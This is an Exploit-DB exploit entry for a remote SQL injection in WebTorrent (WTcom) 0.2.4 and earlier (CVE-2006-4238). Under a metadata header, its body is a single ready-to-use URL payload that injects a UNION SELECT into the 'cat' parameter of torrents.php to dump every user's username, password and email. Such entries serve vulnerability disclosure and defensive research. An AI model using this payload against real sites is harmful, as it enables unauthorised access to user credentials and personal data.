WTcom 0.2.4-alpha - 'torrents.php' SQL Injection

Author: sh1r081
type: webapps
platform: php
port: 
date_added: 2006-08-16 
date_updated: 2016-09-09 
verified: 1 
codes: OSVDB-29476;CVE-2006-4238 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comWTcom-0.2-alpha.tar.gz

# WebTorrent (WTcom) Script <= 0.2.4
# ----------------------------------
# >>> Remote SQL Injection
# <<< Every Username, Password and Email
# ----------------------------------
# Author: sh1r081 (sh1r081[at]gmail.com)

http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

# milw0rm.com [2006-08-17]